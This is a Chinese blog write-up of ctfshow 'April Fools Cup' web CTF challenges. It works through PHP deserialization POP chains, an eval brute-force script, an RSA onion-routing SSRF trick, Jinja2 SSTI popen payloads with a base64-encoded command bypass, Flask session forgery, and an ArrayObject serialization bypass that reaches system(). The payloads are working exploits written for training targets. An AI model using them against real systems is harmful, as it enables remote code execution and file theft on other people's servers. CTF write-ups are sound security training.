ctfshow愚人杯web复现

news/2024/11/29 19:52:08/

easy_signin

题目url

image-20230404183149808

base64解码是face.png,尝试flag.txtflag.php,base64加密后传入都不对,用index.php加密后传入,看源码

image-20230404183412221

将后面的base64解密得到flag

image-20230404183454406

被遗忘的反序列化

源码

<?php# 当前目录中有一个txt文件哦
error_reporting(0);
show_source(__FILE__);
include("check.php");class EeE{public $text;public $eeee;public function __wakeup(){if ($this->text == "aaaa"){echo lcfirst($this->text);}}public function __get($kk){echo "$kk,eeeeeeeeeeeee";}public function __clone(){$a = new cycycycy;$a -> aaa();}}class cycycycy{public $a;private $b;public function aaa(){$get = $_GET['get'];$get = cipher($get);if($get === "p8vfuv8g8v8py"){eval($_POST["eval"]);}}public function __invoke(){$a_a = $this -> a;echo "\$a_a\$";}
}class gBoBg{public $name;public $file;public $coos;private $eeee="-_-";public function __toString(){if(isset($this->name)){$a = new $this->coos($this->file);echo $a;}else if(!isset($this -> file)){return $this->coos->name;}else{$aa = $this->coos;$bb = $this->file;return $aa();}}
}   class w_wuw_w{public $aaa;public $key;public $file;public function __wakeup(){if(!preg_match("/php|63|\*|\?/i",$this -> key)){$this->key = file_get_contents($this -> file);}else{echo "不行哦";}}public function __destruct(){echo $this->aaa;}public function __invoke(){$this -> aaa = clone new EeE;}
}$_ip = $_SERVER["HTTP_AAAAAA"];
unserialize($_ip);

先看怎么传参

$_ip = $_SERVER["HTTP_AAAAAA"];

这一句话的意思是接收header头中 aaaaaa参数的值,就例如这样的

image-20230404223656400

然后提示说有一个txt,但不知道名字是什么,想办法读取文件名

再来看这个类

class gBoBg{public $name;public $file;public $coos;private $eeee="-_-";public function __toString(){if(isset($this->name)){$a = new $this->coos($this->file);echo $a;}else if(!isset($this -> file)){return $this->coos->name;}else{$aa = $this->coos;$bb = $this->file;return $aa();}}
}   

有一个

 $a = new $this->coos($this->file);

coosfile都是可控的,所以可以利用php原生类来读取文件

GlobIterator

GlobIterator 类也可以遍历一个文件目录,但与上面略不同的是其行为类似于 glob(),可以通过模式匹配来寻找文件路径。

它的特点就是,只需要知道部分名称就可以进行遍历

例如

<?php
$dir=new GlobIterator("/*flag*");
echo $dir;

之后就想办法触发__toString(),可以通过EeE类中的

class EeE{public $text;public $eeee;public function __wakeup(){if ($this->text == "aaaa"){echo lcfirst($this->text);

来触发,因为要echo lcfirst($this->text);还要满足if语句让text==a即可

<?php
class EeE{public $text = 'a';public $eeee;}class gBoBg{public $name = '123';public $file = '*txt';public $coos = 'GlobIterator';
}
$e = new EeE();
$e ->text = new gBoBg();
echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:4:"*txt";s:4:"coos";s:12:"GlobIterator";}s:4:"eeee";N;}

image-20230404233020353

得到h1nt.txt,之后官方wp上说在根目录无法直接读,但实际上好像是在本目录可以用原生类SplFileObject

<?php
class EeE{public $text = 'a';public $eeee;}class gBoBg{public $name = '123';public $file = 'h1nt.txt';public $coos = 'SplFileObject';
}
$e = new EeE();
$e ->text = new gBoBg();
echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:8:"h1nt.txt";s:4:"coos";s:13:"SplFileObject";}s:4:"eeee";N;}

但读出来和官方wp上的不一样,没有key

image-20230404233854972

又尝试用file伪协议来读

<?php
class EeE{public $text = 'a';public $eeee;}class gBoBg{public $name = '123';public $file = 'php://filter/convert.base64-encode/resource=h1nt.txt';public $coos = 'SplFileObject';
}
$e = new EeE();
$e ->text = new gBoBg();
echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:52:"php://filter/convert.base64-encode/resource=h1nt.txt";s:4:"coos";s:13:"SplFileObject";}s:4:"eeee";N;}

image-20230404234155231

就都读出来了

image-20230404234240120

#用于check.php 
key:qwertyuiopasdfghjklzxcvbnm123456789 
move:2~4

猜测(看wp)

其中move是移动的意思,猜测这是一个移位的加密,其中猜测key是范围那么就有向左就有3种可能, 向右也有3种可能 但是提示2提示我们random-随机,那么加密可能是2~7随机,那么每次正好相等就是1/24的几率

之后就想办法构造链子触发利用eval函数了

<?php
class EeE{public $text = 'a';public $eeee;}class cycycycy{public $a;}class gBoBg{public $name;public $file = '1';public $coos;}class w_wuw_w{public $aaa;public $key;public $file;}$a = new EeE();
$a ->text = new gBoBg();
$a ->text ->coos = new w_wuw_w();
$a ->text ->coos ->aaa = new cycycycy();
echo serialize($a);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";N;s:4:"file";s:1:"1";s:4:"coos";O:7:"w_wuw_w":3:{s:3:"aaa";O:8:"cycycycy":1:{s:1:"a";N;}s:3:"key";N;s:4:"file";N;}}s:4:"eeee";N;}

之后用脚本爆破key就可以了,贴一个官方的脚本

import requests
import remi = ['i6xstx6d6x6ir','u5zarz5s5z5ue','y4lpel4a4l4yw','sqnhonqjqnqsi','dwmjpmwkwmwdo','fe1ka1ele1efp']
d = 1
while d<2:for i in mi:data = {'eval':'system("cat /f1agaaa");'}url = f"http://67423f19-3ba4-41b5-9e10-716ce8f5e683.challenge.ctf.show/index.php?get={i}"header = {'aaaaaa':'O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";N;s:4:"file";s:1:"1";s:4:"coos";O:7:"w_wuw_w":3:{s:3:"aaa";O:8:"cycycycy":1:{s:1:"a";N;}s:3:"key";N;s:4:"file";N;}}s:4:"eeee";N;}'}reqpose = requests.post(url=url,data=data,headers=header).textre_text = re.findall(r"(?<=</code>).*", reqpose, re.S)if '' not in re_text:print(re_text[0])d += 1

暗网聊天室(假web真密码)

不会密码直接放官方wp

1.刚开始的聊天界面

img

重点信息:

  • 1.提示要本地访问 9999 端口,可能存在 SSRF
  • 2.提示要访问 “点我进入宇宙商城” 链接
  • 3.提示 FLAG 存在于热门网站向其他人发的宣传语中
  • 4.宣传语长度>128
  • 5.右上角的插件可以用

2.点开插件,出现新页面

image-20230405120303218

介绍了匿名原理,并附上了加密代码

  • \1. 可以看到加密是以 128 为一组,想到宣传语长度>128,说明 FLAG 和一些字为一组、下 一个节点的 IP 和一些字为一组
  • \2. 顶部是插件拦截的 自己的私钥、传来的原始数据、用自己私钥解密后的数据、发包按 钮,类似 Burp 的改包功能
  • \3. 通过原始数据的长度 18944,可以推断自己位于节点 1 先自己在本地尝试加密

image-20230405120319554

发现一组加密后的长度为 512,而加密是 128 一组

image-20230405120334385

3.访问 “点我进入宇宙商城“

看看是否可以利用 SSRF 获取敏感信息

image-20230405120351623

可以看到自己 IP,想到加密也利用到了 IP,可能有用 查看 robots.txt

image-20230405120402666

查看 shop.py.bak

image-20230405120415647

想到本地访问 9999 端口 /shop?api=127.0.0.1:9999

image-20230405120429341

获取到 3 个节点的公钥,可以自己进行加密 通过该网站的公钥 1 和自己的私钥 1 进行加解密,发现可行,说明该网站就是用户 A 想到如果对自己 IP 进行加密,然后替换“解密后的数据“中的用户 B 的 IP,那么最终明文 将发送给自己

4.构造 Payload

还是这个图

image-20230405120442584

第二行就是插件中的“解密后的数据”,可以看到第二个 4*512 就是用户 B 的 IP 利用两个公钥加密自己 IP 并替换:

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
from flask import Flask, request, abort
# 加密
def encrypt(plaintext, public_key):cipher = PKCS1_v1_5.new(RSA.importKey(public_key))ciphertext = ''for i in range(0, len(plaintext), 128):ciphertext += cipher.encrypt(plaintext[i:i+128].encode('utf8')).hex()return ciphertext
IP = '2.56.12.89'
plaintext_half = '拦截的 解密后的数据'
# 公钥开头、结尾有俩\n
public_key2 = '-----BEGIN PUBLIC KEY-----\nxxx\n-----END PUBLIC KEY--
---'
public_key3 = '-----BEGIN PUBLIC KEY-----\nxxx\n-----END PUBLIC KEY--
---'
IP_ciphertext = encrypt(IP, public_key3)
IP_ciphertext = encrypt(IP_ciphertext, public_key2)
# 替换最终 IP
plaintext_half_new = plaintext_half[:2048] + IP_ciphertext + 
plaintext_half[4096:]
print(plaintext_half_new)

将新生成的数据替换“解密后的数据”,发送即可获取 FLAG 因为最终传递的 IP 是你自己

image-20230405120510490

5.一把梭脚本

import re
import requests
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
from flask import Flask, request, aborturl = 'http://xxx.challenge.ctf.show/' # 题目URL,先等几秒再运行# 加密
def encrypt(plaintext, public_key):cipher = PKCS1_v1_5.new(RSA.importKey(public_key))ciphertext = ''for i in range(0, len(plaintext), 128):ciphertext += cipher.encrypt(plaintext[i:i+128].encode('utf-8')).hex()return ciphertextdef get_plaintext_half():text = requests.get(url+'/update').textreturn re.findall('[^@]*\.92', text)[0]def get_public_key(public_key):text = requests.get(url+'/shop?api=127.0.0.1:9999').textreturn re.findall('-----BEGIN PUBLIC KEY-----\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n-----END PUBLIC KEY-----', text)[public_key-1]IP = '2.56.12.89'
plaintext_half = get_plaintext_half() # 获取解密后的数据# 获取公钥2、3
public_key2 = get_public_key(2).replace('\n','').replace('-----BEGIN PUBLIC KEY-----','-----BEGIN PUBLIC KEY-----\n').replace('-----END PUBLIC KEY-----','\n-----END PUBLIC KEY-----')
public_key3 = get_public_key(3).replace('\n','').replace('-----BEGIN PUBLIC KEY-----','-----BEGIN PUBLIC KEY-----\n').replace('-----END PUBLIC KEY-----','\n-----END PUBLIC KEY-----')# 两次加密
IP_ciphertext = encrypt(IP, public_key3)
IP_ciphertext = encrypt(IP_ciphertext, public_key2)# 替换最终IP
plaintext_half_new = plaintext_half[:2048] + IP_ciphertext + plaintext_half[4096:]# 请求
requests.post(url + '/pass_message',data = {'message':plaintext_half_new})
# 接收明文
text = requests.get(url+'/update').text
flag = re.findall('ctfshow{.*}', text)[0]
print(flag)
input()

easy_ssti

看源码,提示app.zip,访问一下下载下来

image-20230405003551238

模板渲染是在hello目录下,尝试注入

image-20230405003719284

有ssti漏洞,没有任何过滤,自己构造或直接百度都可

/{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

但在读flag的时候好像把/和f给过滤了,用base64读即可

{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('echo "Y2F0IC9mbGFn"|base64 -d|sh').read()}}

image-20230405003934859

easy_flask

一个登录页面,随便注册一个账号登进去

image-20230405004205502

要admin账户,但可以看源码

image-20230405004238489

这里给了key,八成是session伪造,登录抓包拿到session

key=S3cr3tK3y

image-20230405004521164

flask_session_cookie_manager3解密

image-20230405004749051

将user改为admin再加密

image-20230405004913311

修改session发包登录

image-20230405005153261

但这里只有一个假的flag看源码发现

image-20230405005251266

应该有任意文件下载,尝试下载源码

/download/?filename=app.py

成功得到源码

在源码里看到

image-20230405005518138

在hello路由下可以直接命令执行

image-20230405005732756

/hello/?eval=__import__("os").popen("cat /flag_is_h3re").read()

easy_php

源码

<?php
error_reporting(0);
highlight_file(__FILE__);class ctfshow{public function __wakeup(){die("not allowed!");}public function __destruct(){system($this->ctfshow);}}$data = $_GET['1+1>2'];if(!preg_match("/^[Oa]:[\d]+/i", $data)){unserialize($data);
}?>

先不看过滤,只要执行__destruct()中的system函数即可,给ctfshow赋值

<?php
error_reporting(0);
highlight_file(__FILE__);class ctfshow{public function __wakeup(){die("not allowed!");}public function __destruct(){system($this->ctfshow);}}
$a = new ctfshow();
$a -> ctfshow = 'whoami';
echo serialize($a);
?>//O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}

image-20230405113920158

再看过滤

if(!preg_match("/^[Oa]:[\d]+/i", $data))

不能传入以O和a开头的序列化值,也就是对象和数组的序列化值.

在php低版本中,O或a的冒号后的数字前可以加一个+来进行绕过。但这个题目的版本是7.3无法绕过

看其他师傅的可以将0替换为C来绕过

payload

C:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}

但放到题目中并不通

猜测是题目中的ctfshow类未实现serializable接口,所以不能解析该属性。所以找php中内置的实现了Serializable接口的类

wp使用了ArrayObject()类,使用这个类去修饰ctfshow

<?phpclass ctfshow{public $ctfshow = 'whoami';}
$a= new ArrayObject();
$a -> a = new ctfshow();
echo serialize($a);
?>//C:11:"ArrayObject":74:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}}}

image-20230405114303695

成功回显

image-20230405115145316

最终payload

?1%2b1>2=C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}

easy_class(不会)

直接放大佬的wp


http://www.ppmy.cn/news/47761.html

相关文章

Linux FTP服务

FTP服务 作用 传输文件 端口 FTP服务器默认使用TCP协议的20、21端口与客户端进行通信 20端口用于建立数据连接&#xff0c;并传输文件数据 21端口用于建立控制连接&#xff0c;并传输FTP控制命令 模式 FTP数据连接分为主动模式和被动模式 主动模式&#xff1a;客户端告诉服务端…

记一次fastjson反序列化到内网靶标

声明&#xff1a;文中涉及到的技术和工具&#xff0c;仅供学习使用&#xff0c;禁止从事任何非法活动&#xff0c;如因此造成的直接或间接损失&#xff0c;均由使用者自行承担责任。 点点关注不迷路&#xff0c;每周不定时持续分享各种干货。 众亦信安&#xff0c;中意你啊&a…

微信跨平台方案Donut快速上手

一、Donut简介 Donut 是微信开发出的多端框架&#xff0c;用于支持使用小程序原生语法开发移动应用的框架&#xff0c;开发者可以一次编码&#xff0c;就可以编译出小程序和 Android 以及 iOS 应用&#xff0c;实现多端开发。能够帮助企业有效降低多端应用开发的技术门槛和研发…

网络原理——IP地址与mac地址

目录 IP地址 IP地址 IP地址的组成 子网掩码 mac地址 冲突域与广播域 数据传输流程 IP地址 IP地址 互联网协议地址。每一个联网的主机都会分配一个IP地址。为32位二进制数&#xff0c;用4个.均分为四部分&#xff0c;在命令提示符中输入&#xff1a;ipconfig命令&#…

webpack 5 实战(1)

一、为什么使用webpack 个人将前端开发分为三个阶段&#xff1a; 1.1 Web1.0 Web1.0前端主要工作&#xff1a; 前端主要编写静态页面对于JavaScript的使用&#xff0c;主要是进行表单验证和动画效果制作 1.2 Web2.0之AJAX 伴随着AJAX的诞生&#xff0c;前端的工作模式也发…

北斗导航 | 周跳处理(cycle-slips)方法(matlab工具)

===================================================== github:https://github.com/MichaelBeechan CSDN:https://blog.csdn.net/u011344545 ===================================================== 本文介绍了一种基于MATLAB的GPS周跳(cycle-slip)处理软件软件包。在测…

TensorFlow 2.0 的新增功能:第三、四部分

原文&#xff1a;What’s New in TensorFlow 2.0 协议&#xff1a;CC BY-NC-SA 4.0 译者&#xff1a;飞龙 本文来自【ApacheCN 深度学习 译文集】&#xff0c;采用译后编辑&#xff08;MTPE&#xff09;流程来尽可能提升效率。 不要担心自己的形象&#xff0c;只关心如何实现目…

什么是存算分离架构?

随着硬件技术的快速进步&#xff0c;尤其是网络和存储设备的性能迅速提升&#xff0c;以及云计算厂商推动软硬件协同加速的云存储服务&#xff0c;越来越多的企业开始基于云存储来构建数据存储服务&#xff0c;或数据湖&#xff0c;因此就需要单独再建设一个独立的计算层来提供…